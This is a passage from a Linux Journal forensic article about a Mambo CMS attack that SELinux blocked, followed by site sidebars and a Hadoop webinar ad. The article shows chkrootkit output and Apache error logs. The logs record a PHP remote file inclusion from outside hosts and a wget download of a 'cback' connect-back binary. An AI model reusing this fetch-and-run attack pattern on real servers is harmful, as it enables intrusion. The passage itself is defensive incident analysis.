Mambo Exploit Blocked by SELinux
Listing 6. chkrootkit Output
# chkrootkit -q /usr/lib/firefox-1.0.4/chrome/.reregchrome /usr/lib/firefox-1.0.6/chrome/.reregchrome /usr/lib/jvm/java-1.4.2-ibm-184.108.40.206/jre/.systemPrefs /usr/lib/jvm/java-1.4.2-ibm-220.127.116.11/jre/.systemPrefs/ ↪.system.lock /usr/lib/jvm/java-1.4.2-ibm-18.104.22.168/jre/.systemPrefs/ ↪.systemRootModFile /usr/lib/firefox-1.0.8/chrome/.reregchrome /usr/lib/firefox-1.0.7/chrome/.reregchrome /usr/lib/perl5/5.8.5/i386-linux-thread-multi/.packlist /usr/lib/perl5/vendor_perl/5.8.5/i386-linux-thread-multi/ ↪auto/mod_perl/.packlist /usr/lib/jvm/java-1.4.2-ibm-22.214.171.124/jre/.systemPrefs INFECTED (PORTS: 465)
The chkrootkit program checks for and analyzes various files that rootkits and worms commonly leave behind. It warns about hidden files in unexpected places and services running on ports that malware often uses. A quick inspection revealed that the hidden files this listed were all harmless. The INFECTED warning on port 465 was a false alarm, because this computer was running a Web server that listens for https on port 465. In this case, analyzing the chkrootkit output did not reveal a real rootkit problem. Running chkrootkit can give you some extra peace of mind when you know an attacker has penetrated your defenses, even though its checks are not conclusive.
The server ran SELinux using the targeted policy at the time of the attack. The audit log message that originally sounded the alarm that all was not well was an access denied message. The Web server error log provided more detail in the form of the output of the injected shell code, including the wget session and the access denied message resulting from the attempted execution of wget, as shown in Listing 7.
Listing 7. Web Server Error Logs Showing Attack Traces
[Thu May 04 07:52:24 2006] [error] [client 10.9.233.25] File does not exist: /var/www/html/mambo [client 10.9.233.25] PHP Warning: main(http://ess.trix.net/therules.dat): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found\r\n in http://172.16.31.57/cmd.gif?/includes/HTML_toolbar.php on line 13 [client 10.9.233.25] PHP Warning: main(): Failed opening 'http://ess.trix.net/therules.dat' for inclusion (include_path='.:/usr/share/pear') in http://172.16.31.57/cmd.gif?/includes/HTML_toolbar.php on line 13 [client 10.9.233.25] PHP Notice: Undefined variable: pro4 in http://172.16.31.57/cmd.gif?/includes/HTML_toolbar.php on line 69 [ ...output trimmed ] [client 10.9.233.25] PHP Notice: Undefined variable: SERVER_SOFTWARE in http://172.16.31.57/cmd.gif?/includes/HTML_toolbar.php on line 112 [client 10.9.233.25] PHP Notice: Undefined variable: SERVER_VERSION in http://172.16.31.57/cmd.gif?/includes/HTML_toolbar.php on line 112 --07:52:24-- http://172.16.31.57/cback => `cback' Connecting to 172.16.31.57:80... connected. HTTP request sent, awaiting response... [Thu May 04 07:52:25 2006] [error] [client 10.9.233.25] File does not exist: /var/www/html/cvs 200 OK Length: 13,901 (14K) [text/plain] 0K .......... ... 100% 110.90 KB/s 07:52:27 (110.90 KB/s) - `cback' saved [13901/13901] sh: ./cback: Permission denied [client 10.9.233.25] PHP Notice: Undefined variable: ch_msg in http://172.16.31.57/cmd.gif?/includes/HTML_toolbar.php on line 202 [ ...output trimmed...] [client 10.9.233.25] PHP Fatal error: Cannot redeclare safemode() (previously declared in http://172.16.31.57/cmd.gif?/includes/HTML_toolbar.php:129) in http://172.16.31.57/cmd.gif?/includes/footer.php on line 129
SELinux prevented the cback executable from running, saving targetbox from the next stage of the worm.
Newer versions of Mambo close the hole that the attacker exploited, so I could install a new version without being vulnerable to the same exploit.
Many of the tools required to analyze an attack are already a core part of all modern Linux distributions. Combined with the power of modern search engines and the public disclosure of known vulnerabilities, you can often determine a good deal of information about the nature of an attack.
Installing something from source code to test it out, then leaving it on a publicly available computer made the system vulnerable. That this test installation lived in the document root of the main virtual host on the Web server made it even more exposed and vulnerable to discovery by worms.
Many PHP-powered systems have installation instructions that essentially tell you to unarchive the software somewhere inside the document root of a Web server, then modify some configuration files. You often cannot use the same type of clean operating-system-wide packaging for PHP systems, as each installation uses a distinct set of PHP templates. It took about 11 months between installing Mambo and the attack, during which time I did not update the software at all.
Using yum or apt-get to update Mambo would help keep it up to date. When I started investigating Mambo, I could not find RPM packaging for it, though third parties have created RPMs for Mambo since then. Operating system vendors and software authors need to work on better mechanisms for automatic software maintenance of Web systems.
SELinux really saved the day, preventing the exploit program from running. Without the protection of SELinux, this easily could have turned into a root compromise requiring a much more extensive analysis and recovery effort.
|Dynamic DNS—an Object Lesson in Problem Solving||May 21, 2013|
|Using Salt Stack and Vagrant for Drupal Development||May 20, 2013|
|Making Linux and Android Get Along (It's Not as Hard as It Sounds)||May 16, 2013|
|Drupal Is a Framework: Why Everyone Needs to Understand This||May 15, 2013|
|Home, My Backup Data Center||May 13, 2013|
|Non-Linux FOSS: Seashore||May 10, 2013|
- Dynamic DNS—an Object Lesson in Problem Solving
- Making Linux and Android Get Along (It's Not as Hard as It Sounds)
- Using Salt Stack and Vagrant for Drupal Development
- New Products
- A Topic for Discussion - Open Source Feature-Richness?
- Drupal Is a Framework: Why Everyone Needs to Understand This
- RSS Feeds
- Validate an E-Mail Address with PHP, the Right Way
- Readers' Choice Awards
- Tech Tip: Really Simple HTTP Server with Python
12 min 56 sec ago
- Reply to comment | Linux Journal
45 min 18 sec ago
- All the articles you talked
3 hours 8 min ago
- All the articles you talked
3 hours 12 min ago
- All the articles you talked
3 hours 13 min ago
7 hours 38 min ago
- Keeping track of IP address
9 hours 29 min ago
- Roll your own dynamic dns
14 hours 42 min ago
- Please correct the URL for Salt Stack's web site
17 hours 53 min ago
- Android is Linux -- why no better inter-operation
20 hours 9 min ago
Free Webinar: Hadoop
How to Build an Optimal Hadoop Cluster to Store and Maintain Unlimited Amounts of Data Using Microservers
Realizing the promise of Apache® Hadoop® requires the effective deployment of compute, memory, storage and networking to achieve optimal results. With its flexibility and multitude of options, it is easy to over or under provision the server infrastructure, resulting in poor performance and high TCO. Join us for an in depth, technical discussion with industry experts from leading Hadoop and server companies who will provide insights into the key considerations for designing and deploying an optimal Hadoop cluster.
Some of key questions to be discussed are:
- What is the “typical” Hadoop cluster and what should be installed on the different machine types?
- Why should you consider the typical workload patterns when making your hardware decisions?
- Are all microservers created equal for Hadoop deployments?
- How do I plan for expansion if I require more compute, memory, storage or networking?